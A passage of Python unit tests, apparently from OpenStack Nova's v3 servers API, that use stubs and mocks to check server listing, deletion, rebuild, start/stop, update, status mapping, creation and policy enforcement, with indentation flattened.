self.assertEqual(s['hostId'], '')
self.assertEqual(s['name'], 'server%d' % (i + 1))
self.assertEqual(s['image'], expected_image)
self.assertEqual(s['flavor'], expected_flavor)
self.assertEqual(s['status'], 'BUILD')
self.assertEqual(s['metadata']['seq'], str(i + 1))
def test_get_all_server_details_with_host(self):
"""We want to make sure that if two instances are on the same host,
then they return the same hostId. If two instances are on different
hosts, they should return different hostIds. In this test,
there are 5 instances - 2 on one host and 3 on another.
"""
def return_servers_with_host(context, *args, **kwargs):
return [fakes.stub_instance(i + 1, 'fake', 'fake', host=i % 2,
uuid=fakes.get_fake_uuid(i))
for i in xrange(5)]
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers_with_host)
req = fakes.HTTPRequestV3.blank('/servers/detail')
res_dict = self.controller.detail(req)
server_list = res_dict['servers']
host_ids = [server_list[0]['hostId'], server_list[1]['hostId']]
self.assertTrue(host_ids[0] and host_ids[1])
self.assertNotEqual(host_ids[0], host_ids[1])
for i, s in enumerate(server_list):
self.assertEqual(s['id'], fakes.get_fake_uuid(i))
self.assertEqual(s['hostId'], host_ids[i % 2])
self.assertEqual(s['name'], 'server%d' % (i + 1))
def test_get_servers_joins_pci_devices(self):
self.expected_attrs = None
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.expected_attrs = expected_attrs
return []
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers', use_admin_context=True)
self.assertIn('servers', self.controller.index(req))
self.assertIn('pci_devices', self.expected_attrs)
class ServersControllerDeleteTest(ControllerTest):
def setUp(self):
super(ServersControllerDeleteTest, self).setUp()
self.server_delete_called = False
def instance_destroy_mock(*args, **kwargs):
self.server_delete_called = True
deleted_at = timeutils.utcnow()
return fake_instance.fake_db_instance(deleted_at=deleted_at)
self.stubs.Set(db, 'instance_destroy', instance_destroy_mock)
def _create_delete_request(self, uuid):
fakes.stub_out_instance_quota(self.stubs, 0, 10)
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
req.method = 'DELETE'
return req
def _delete_server_instance(self, uuid=FAKE_UUID):
req = self._create_delete_request(uuid)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
self.controller.delete(req, uuid)
def test_delete_server_instance(self):
self._delete_server_instance()
self.assertTrue(self.server_delete_called)
def test_delete_server_instance_not_found(self):
self.assertRaises(webob.exc.HTTPNotFound,
self._delete_server_instance,
uuid='non-existent-uuid')
def test_delete_server_instance_while_building(self):
req = self._create_delete_request(FAKE_UUID)
self.controller.delete(req, FAKE_UUID)
self.assertTrue(self.server_delete_called)
def test_delete_locked_server(self):
req = self._create_delete_request(FAKE_UUID)
self.stubs.Set(compute_api.API, 'soft_delete',
fakes.fake_actions_to_locked_server)
self.stubs.Set(compute_api.API, 'delete',
fakes.fake_actions_to_locked_server)
self.assertRaises(webob.exc.HTTPConflict, self.controller.delete,
req, FAKE_UUID)
def test_delete_server_instance_while_resize(self):
req = self._create_delete_request(FAKE_UUID)
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE,
task_state=task_states.RESIZE_PREP))
self.controller.delete(req, FAKE_UUID)
# Delete shoud be allowed in any case, even during resizing,
# because it may get stuck.
self.assertTrue(self.server_delete_called)
def test_delete_server_instance_if_not_launched(self):
self.flags(reclaim_instance_interval=3600)
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
req.method = 'DELETE'
self.server_delete_called = False
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(launched_at=None))
def instance_destroy_mock(*args, **kwargs):
self.server_delete_called = True
deleted_at = timeutils.utcnow()
return fake_instance.fake_db_instance(deleted_at=deleted_at)
self.stubs.Set(db, 'instance_destroy', instance_destroy_mock)
self.controller.delete(req, FAKE_UUID)
# delete() should be called for instance which has never been active,
# even if reclaim_instance_interval has been set.
self.assertEqual(self.server_delete_called, True)
class ServersControllerRebuildInstanceTest(ControllerTest):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
image_href = 'http://localhost/v3/fake/images/%s' % image_uuid
def setUp(self):
super(ServersControllerRebuildInstanceTest, self).setUp()
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_states.ACTIVE))
self.body = {
'rebuild': {
'name': 'new_name',
'imageRef': self.image_href,
'metadata': {
'open': 'stack',
},
},
}
self.req = fakes.HTTPRequest.blank('/fake/servers/a/action')
self.req.method = 'POST'
self.req.headers["content-type"] = "application/json"
def test_rebuild_instance_with_blank_metadata_key(self):
self.body['rebuild']['metadata'][''] = 'world'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_with_metadata_key_too_long(self):
self.body['rebuild']['metadata'][('a' * 260)] = 'world'
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_with_metadata_value_too_long(self):
self.body['rebuild']['metadata']['key1'] = ('a' * 260)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=self.body)
def test_rebuild_instance_with_metadata_value_not_string(self):
self.body['rebuild']['metadata']['key1'] = 1
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=self.body)
def test_rebuild_instance_fails_when_min_ram_too_small(self):
# make min_ram larger than our instance ram size
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='active', properties={'key1': 'value1'},
min_ram="4096", min_disk="10")
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_fails_when_min_disk_too_small(self):
# make min_disk larger than our instance disk size
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='active', properties={'key1': 'value1'},
min_ram="128", min_disk="100000")
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild, self.req,
FAKE_UUID, body=self.body)
def test_rebuild_instance_image_too_large(self):
# make image size larger than our instance disk size
size = str(1000 * (1024 ** 3))
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='active', size=size)
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_name_all_blank(self):
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True, status='active')
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.body['rebuild']['name'] = ' '
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_with_deleted_image(self):
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True,
status='DELETED')
self.stubs.Set(fake._FakeImageService, 'show', fake_get_image)
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_rebuild_instance_onset_file_limit_over_quota(self):
def fake_get_image(self, context, image_href, **kwargs):
return dict(id='76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
name='public image', is_public=True, status='active')
with contextlib.nested(
mock.patch.object(fake._FakeImageService, 'show',
side_effect=fake_get_image),
mock.patch.object(self.controller.compute_api, 'rebuild',
side_effect=exception.OnsetFileLimitExceeded)
) as (
show_mock, rebuild_mock
):
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_rebuild,
self.req, FAKE_UUID, body=self.body)
def test_start(self):
self.mox.StubOutWithMock(compute_api.API, 'start')
compute_api.API.start(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.controller._start_server(req, FAKE_UUID, body)
def test_start_policy_failed(self):
rules = {
"compute:v3:servers:start":
common_policy.parse_rule("project_id:non_fake")
}
policy.set_rules(rules)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller._start_server,
req, FAKE_UUID, body)
self.assertIn("compute:v3:servers:start", exc.format_message())
def test_start_not_ready(self):
self.stubs.Set(compute_api.API, 'start', fake_start_stop_not_ready)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._start_server, req, FAKE_UUID, body)
def test_start_locked_server(self):
self.stubs.Set(compute_api.API, 'start',
fakes.fake_actions_to_locked_server)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._start_server, req, FAKE_UUID, body)
def test_start_invalid(self):
self.stubs.Set(compute_api.API, 'start', fake_start_stop_invalid_state)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._start_server, req, FAKE_UUID, body)
def test_stop(self):
self.mox.StubOutWithMock(compute_api.API, 'stop')
compute_api.API.stop(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop="")
self.controller._stop_server(req, FAKE_UUID, body)
def test_stop_policy_failed(self):
rules = {
"compute:v3:servers:stop":
common_policy.parse_rule("project_id:non_fake")
}
policy.set_rules(rules)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop='')
exc = self.assertRaises(exception.PolicyNotAuthorized,
self.controller._stop_server,
req, FAKE_UUID, body)
self.assertIn("compute:v3:servers:stop", exc.format_message())
def test_stop_not_ready(self):
self.stubs.Set(compute_api.API, 'stop', fake_start_stop_not_ready)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._stop_server, req, FAKE_UUID, body)
def test_stop_locked_server(self):
self.stubs.Set(compute_api.API, 'stop',
fakes.fake_actions_to_locked_server)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(stop="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._stop_server, req, FAKE_UUID, body)
def test_stop_invalid_state(self):
self.stubs.Set(compute_api.API, 'stop', fake_start_stop_invalid_state)
req = fakes.HTTPRequestV3.blank('/servers/%s/action' % FAKE_UUID)
body = dict(start="")
self.assertRaises(webob.exc.HTTPConflict,
self.controller._stop_server, req, FAKE_UUID, body)
def test_start_with_bogus_id(self):
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid_not_found)
req = fakes.HTTPRequestV3.blank('/servers/test_inst/action')
body = dict(start="")
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._start_server, req, 'test_inst', body)
def test_stop_with_bogus_id(self):
self.stubs.Set(db, 'instance_get_by_uuid',
fake_instance_get_by_uuid_not_found)
req = fakes.HTTPRequestV3.blank('/servers/test_inst/action')
body = dict(stop="")
self.assertRaises(webob.exc.HTTPNotFound,
self.controller._stop_server, req, 'test_inst', body)
class ServersControllerUpdateTest(ControllerTest):
def _get_request(self, body=None, options=None):
if options:
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get(**options))
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = jsonutils.dumps(body)
return req
def test_update_server_all_attributes(self):
body = {'server': {
'name': 'server_test',
}}
req = self._get_request(body, {'name': 'server_test'})
res_dict = self.controller.update(req, FAKE_UUID, body=body)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
self.assertEqual(res_dict['server']['name'], 'server_test')
def test_update_server_name(self):
body = {'server': {'name': 'server_test'}}
req = self._get_request(body, {'name': 'server_test'})
res_dict = self.controller.update(req, FAKE_UUID, body=body)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
self.assertEqual(res_dict['server']['name'], 'server_test')
def test_update_server_name_too_long(self):
body = {'server': {'name': 'x' * 256}}
req = self._get_request(body, {'name': 'server_test'})
self.assertRaises(exception.ValidationError, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_name_all_blank_spaces(self):
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get(name='server_test'))
req = fakes.HTTPRequest.blank('/v3/servers/%s' % FAKE_UUID)
req.method = 'PUT'
req.content_type = 'application/json'
body = {'server': {'name': ' ' * 64}}
req.body = jsonutils.dumps(body)
self.assertRaises(exception.ValidationError, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_admin_password_ignored(self):
inst_dict = dict(name='server_test', admin_password='bacon')
body = dict(server=inst_dict)
def server_update(context, id, params):
filtered_dict = {
'display_name': 'server_test',
}
self.assertEqual(params, filtered_dict)
filtered_dict['uuid'] = id
return filtered_dict
self.stubs.Set(db, 'instance_update', server_update)
# FIXME (comstud)
# self.stubs.Set(db, 'instance_get',
# return_server_with_attributes(name='server_test'))
req = fakes.HTTPRequest.blank('/fake/servers/%s' % FAKE_UUID)
req.method = 'PUT'
req.content_type = "application/json"
req.body = jsonutils.dumps(body)
res_dict = self.controller.update(req, FAKE_UUID, body=body)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
self.assertEqual(res_dict['server']['name'], 'server_test')
def test_update_server_not_found(self):
def fake_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(compute_api.API, 'get', fake_get)
body = {'server': {'name': 'server_test'}}
req = self._get_request(body)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_not_found_on_update(self):
def fake_update(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(db, 'instance_update_and_get_original', fake_update)
body = {'server': {'name': 'server_test'}}
req = self._get_request(body)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update,
req, FAKE_UUID, body=body)
def test_update_server_policy_fail(self):
rule = {'compute:update': common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
body = {'server': {'name': 'server_test'}}
req = self._get_request(body, {'name': 'server_test'})
self.assertRaises(exception.PolicyNotAuthorized,
self.controller.update, req, FAKE_UUID, body=body)
class ServerStatusTest(test.TestCase):
def setUp(self):
super(ServerStatusTest, self).setUp()
fakes.stub_out_nw_api(self.stubs)
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def _get_with_state(self, vm_state, task_state=None):
self.stubs.Set(db, 'instance_get_by_uuid',
fakes.fake_instance_get(vm_state=vm_state,
task_state=task_state))
request = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
return self.controller.show(request, FAKE_UUID)
def test_active(self):
response = self._get_with_state(vm_states.ACTIVE)
self.assertEqual(response['server']['status'], 'ACTIVE')
def test_reboot(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.REBOOTING)
self.assertEqual(response['server']['status'], 'REBOOT')
def test_reboot_hard(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.REBOOTING_HARD)
self.assertEqual(response['server']['status'], 'HARD_REBOOT')
def test_reboot_resize_policy_fail(self):
def fake_get_server(context, req, id):
return fakes.stub_instance(id)
self.stubs.Set(self.controller, '_get_server', fake_get_server)
rule = {'compute:reboot':
common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
req = fakes.HTTPRequestV3.blank('/servers/1234/action')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller._action_reboot, req, '1234',
{'reboot': {'type': 'HARD'}})
def test_rebuild(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.REBUILDING)
self.assertEqual(response['server']['status'], 'REBUILD')
def test_rebuild_error(self):
response = self._get_with_state(vm_states.ERROR)
self.assertEqual(response['server']['status'], 'ERROR')
def test_resize(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.RESIZE_PREP)
self.assertEqual(response['server']['status'], 'RESIZE')
def test_confirm_resize_policy_fail(self):
def fake_get_server(context, req, id):
return fakes.stub_instance(id)
self.stubs.Set(self.controller, '_get_server', fake_get_server)
rule = {'compute:confirm_resize':
common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
req = fakes.HTTPRequestV3.blank('/servers/1234/action')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller._action_confirm_resize, req, '1234', {})
def test_verify_resize(self):
response = self._get_with_state(vm_states.RESIZED, None)
self.assertEqual(response['server']['status'], 'VERIFY_RESIZE')
def test_revert_resize(self):
response = self._get_with_state(vm_states.RESIZED,
task_states.RESIZE_REVERTING)
self.assertEqual(response['server']['status'], 'REVERT_RESIZE')
def test_revert_resize_policy_fail(self):
def fake_get_server(context, req, id):
return fakes.stub_instance(id)
self.stubs.Set(self.controller, '_get_server', fake_get_server)
rule = {'compute:revert_resize':
common_policy.parse_rule('role:admin')}
policy.set_rules(rule)
req = fakes.HTTPRequestV3.blank('/servers/1234/action')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller._action_revert_resize, req, '1234', {})
def test_password_update(self):
response = self._get_with_state(vm_states.ACTIVE,
task_states.UPDATING_PASSWORD)
self.assertEqual(response['server']['status'], 'PASSWORD')
def test_stopped(self):
response = self._get_with_state(vm_states.STOPPED)
self.assertEqual(response['server']['status'], 'SHUTOFF')
class ServersControllerCreateTest(test.TestCase):
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(ServersControllerCreateTest, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
fakes.stub_out_nw_api(self.stubs)
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def instance_create(context, inst):
inst_type = flavors.get_flavor_by_flavor_id(3)
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
def_image_ref = 'http://localhost/images/%s' % image_uuid
self.instance_cache_num += 1
instance = fake_instance.fake_db_instance(**{
'id': self.instance_cache_num,
'display_name': inst['display_name'] or 'test',
'uuid': FAKE_UUID,
'instance_type': dict(inst_type),
'image_ref': inst.get('image_ref', def_image_ref),
'user_id': 'fake',
'project_id': 'fake',
'reservation_id': inst['reservation_id'],
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"config_drive": None,
"progress": 0,
"fixed_ips": [],
"task_state": "",
"vm_state": "",
"root_device_name": inst.get('root_device_name', 'vda'),
})
self.instance_cache_by_id[instance['id']] = instance
self.instance_cache_by_uuid[instance['uuid']] = instance
return instance
def instance_get(context, instance_id):
"""Stub for compute/api create() pulling in instance after
scheduling
"""
return self.instance_cache_by_id[instance_id]
def instance_update(context, uuid, values):
instance = self.instance_cache_by_uuid[uuid]
instance.update(values)
return instance
def server_update(context, instance_uuid, params, update_cells=True):
inst = self.instance_cache_by_uuid[instance_uuid]
inst.update(params)
return inst
def server_update_and_get_original(
context, instance_uuid, params, update_cells=False,
columns_to_join=None):
inst = self.instance_cache_by_uuid[instance_uuid]
inst.update(params)
return (inst, inst)
def fake_method(*args, **kwargs):
pass
def project_get_networks(context, user_id):
return dict(id='1', host='localhost')
def queue_get_for(context, *args):
return 'network_topic'
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
self.stubs.Set(uuid, 'uuid4', fake_gen_uuid)
self.stubs.Set(db, 'project_get_networks',
project_get_networks)
self.stubs.Set(db, 'instance_create', instance_create)
self.stubs.Set(db, 'instance_system_metadata_update',
fake_method)
self.stubs.Set(db, 'instance_get', instance_get)
self.stubs.Set(db, 'instance_update', instance_update)
self.stubs.Set(db, 'instance_update_and_get_original',
server_update_and_get_original)
self.stubs.Set(manager.VlanManager, 'allocate_fixed_ip',
fake_method)
self.body = {
'server': {
'name': 'server_test',
'imageRef': self.image_uuid,
'flavorRef': self.flavor_ref,
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
self.bdm = [{'delete_on_termination': 1,
'device_name': 123,
'volume_size': 1,
'volume_id': '11111111-1111-1111-1111-111111111111'}]
self.req = fakes.HTTPRequest.blank('/fake/servers')
self.req.method = 'POST'
self.req.headers["content-type"] = "application/json"
def _check_admin_password_len(self, server_dict):
"""utility function - check server_dict for admin_password length."""
self.assertEqual(CONF.password_length,
len(server_dict["adminPass"]))
def _check_admin_password_missing(self, server_dict):
"""utility function - check server_dict for admin_password absence."""
self.assertNotIn("adminPass", server_dict)
def _test_create_instance(self, flavor=2):
image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
self.body['server']['imageRef'] = image_uuid
self.body['server']['flavorRef'] = flavor
self.req.body = jsonutils.dumps(self.body)
server = self.controller.create(self.req, body=self.body).obj['server']
self._check_admin_password_len(server)
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_private_flavor(self):
values = {
'name': 'fake_name',
'memory_mb': 512,
'vcpus': 1,
'root_gb': 10,
'ephemeral_gb': 10,
'flavorid': '1324',
'swap': 0,
'rxtx_factor': 0.5,
'vcpu_weight': 1,
'disabled': False,
'is_public': False,
}
db.flavor_create(context.get_admin_context(), values)
self.assertRaises(webob.exc.HTTPBadRequest, self._test_create_instance,
flavor=1324)
def test_create_server_bad_image_href(self):
image_href = 1
self.body['server']['min_count'] = 1
self.body['server']['imageRef'] = image_href,
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(exception.ValidationError,
self.controller.create,
self.req, body=self.body)
# TODO(cyeoh): bp-v3-api-unittests
# This needs to be ported to the os-networks extension tests
# def test_create_server_with_invalid_networks_parameter(self):
# self.ext_mgr.extensions = {'os-networks': 'fake'}
# image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
# flavor_ref = 'http://localhost/123/flavors/3'
# body = {
# 'server': {
# 'name': 'server_test',
# 'imageRef': image_href,
# 'flavorRef': flavor_ref,
# 'networks': {'uuid': '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'},
# }
# }
# req = fakes.HTTPRequest.blank('/v2/fake/servers')
# req.method = 'POST'
# req.body = jsonutils.dumps(body)
# req.headers["content-type"] = "application/json"
# self.assertRaises(webob.exc.HTTPBadRequest,
# self.controller.create,
# req,
# body)
def test_create_server_with_deleted_image(self):
# Get the fake image service so we can set the status to deleted
(image_service, image_id) = glance.get_remote_image_service(
context, '')
image_service.update(context, self.image_uuid, {'status': 'DELETED'})
self.addCleanup(image_service.update, context, self.image_uuid,
{'status': 'active'})
self.body['server']['flavorRef'] = 2
self.req.body = jsonutils.dumps(self.body)
with testtools.ExpectedException(
webob.exc.HTTPBadRequest,
'Image 76fa36fc-c930-4bf3-8c8a-ea2a2420deb6 is not active.'):
self.controller.create(self.req, body=self.body)
def test_create_server_image_too_large(self):
# Get the fake image service so we can set the status to deleted
(image_service, image_id) = glance.get_remote_image_service(
context, self.image_uuid)
image = image_service.show(context, image_id)
orig_size = image['size']
new_size = str(1000 * (1024 ** 3))
image_service.update(context, self.image_uuid, {'size': new_size})
self.addCleanup(image_service.update, context, self.image_uuid,
{'size': orig_size})
self.body['server']['flavorRef'] = 2
self.req.body = jsonutils.dumps(self.body)
with testtools.ExpectedException(
webob.exc.HTTPBadRequest,
"Flavor's disk is too small for requested image."):
self.controller.create(self.req, body=self.body)
def test_create_instance_image_ref_is_bookmark(self):
image_href = 'http://localhost/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
self.req.body = jsonutils.dumps(self.body)
res = self.controller.create(self.req, body=self.body).obj
server = res['server']
self.assertEqual(FAKE_UUID, server['id'])
def test_create_instance_image_ref_is_invalid(self):
image_uuid = 'this_is_not_a_valid_uuid'
image_href = 'http://localhost/images/%s' % image_uuid
flavor_ref = 'http://localhost/flavors/3'
self.body['server']['imageRef'] = image_href
self.body['server']['flavorRef'] = flavor_ref
self.req.body = jsonutils.dumps(self.body)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
self.req, body=self.body)
def test_create_instance_no_key_pair(self):
fakes.stub_out_key_pair_funcs(self.stubs, have_key_pair=False)
self._test_create_instance()
def _test_create_extra(self, params, no_image=False):
self.body['server']['flavorRef'] = 2
if no_image:
self.body['server'].pop('imageRef', None)
self.body['server'].update(params)
self.req.body = jsonutils.dumps(self.body)
self.req.headers["content-type"] = "application/json"
self.controller.create(self.req, body=self.body).obj['server']
# TODO(cyeoh): bp-v3-api-unittests
# This needs to be ported to the os-keypairs extension tests
# def test_create_instance_with_keypairs_enabled(self):
# self.ext_mgr.extensions = {'os-keypairs': 'fake'}
# key_name = 'green'
#
# params = {'key_name': key_name}
# old_create = compute_api.API.create
#
# # NOTE(sdague): key pair goes back to the database,
# # so we need to stub it out for tests
# def key_pair_get(context, user_id, name):
# return {'public_key': 'FAKE_KEY',
# 'fingerprint': 'FAKE_FINGERPRINT',
# 'name': name}
#
# def create(*args, **kwargs):
# self.assertEqual(kwargs['key_name'], key_name)
# return old_create(*args, **kwargs)
#
# self.stubs.Set(db, 'key_pair_get', key_pair_get)
# self.stubs.Set(compute_api.API, 'create', create)
# self._test_create_extra(params)
#
# TODO(cyeoh): bp-v3-api-unittests
# This needs to be ported to the os-networks extension tests
# def test_create_instance_with_networks_enabled(self):
# self.ext_mgr.extensions = {'os-networks': 'fake'}
# net_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
# requested_networks = [{'uuid': net_uuid}]
# params = {'networks': requested_networks}
# old_create = compute_api.API.create
# def create(*args, **kwargs):
# result = [('76fa36fc-c930-4bf3-8c8a-ea2a2420deb6', None)]
# self.assertEqual(kwargs['requested_networks'], result)
# return old_create(*args, **kwargs)
# self.stubs.Set(compute_api.API, 'create', create)
# self._test_create_extra(params)
def test_create_instance_with_port_with_no_fixed_ips(self):
port_id = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port_id}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.PortRequiresFixedIP(port_id=port_id)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_raise_user_data_too_large(self, mock_create):
mock_create.side_effect = exception.InstanceUserDataTooLarge(
maxsize=1, length=2)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
self.req, body=self.body)
def test_create_instance_with_network_with_no_subnet(self):
network = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network}]
params = {'networks': requested_networks}
def fake_create(*args, **kwargs):
raise exception.NetworkRequiresSubnet(network_uuid=network)
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params)
def test_create_instance_with_non_unique_secgroup_name(self):
network = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network}]
params = {'networks': requested_networks,
'security_groups': [{'name': 'dup'}, {'name': 'dup'}]}
def fake_create(*args, **kwargs):
raise exception.NoUniqueMatch("No Unique match found for ...")
self.stubs.Set(compute_api.API, 'create', fake_create)
self.assertRaises(webob.exc.HTTPConflict,
self._test_create_extra, params)
def test_create_instance_with_networks_disabled_neutronv2(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
net_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
requested_networks = [{'uuid': net_uuid}]
params = {'networks': requested_networks}
old_create = compute_api.API.create
def create(*args, **kwargs):
result = [('76fa36fc-c930-4bf3-8c8a-ea2a2420deb6', None,
None)]
self.assertEqual(result, kwargs['requested_networks'].as_tuples())
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_with_networks_disabled(self):
net_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
requested_networks = [{'uuid': net_uuid}]
params = {'networks': requested_networks}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertIsNone(kwargs['requested_networks'])
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_with_pass_disabled(self):
# test with admin passwords disabled See lp bug 921814
self.flags(enable_instance_password=False)
# proper local hrefs must start with 'http://localhost/v3/'
self.flags(enable_instance_password=False)
image_href = 'http://localhost/v2/fake/images/%s' % self.image_uuid
self.body['server']['imageRef'] = image_href
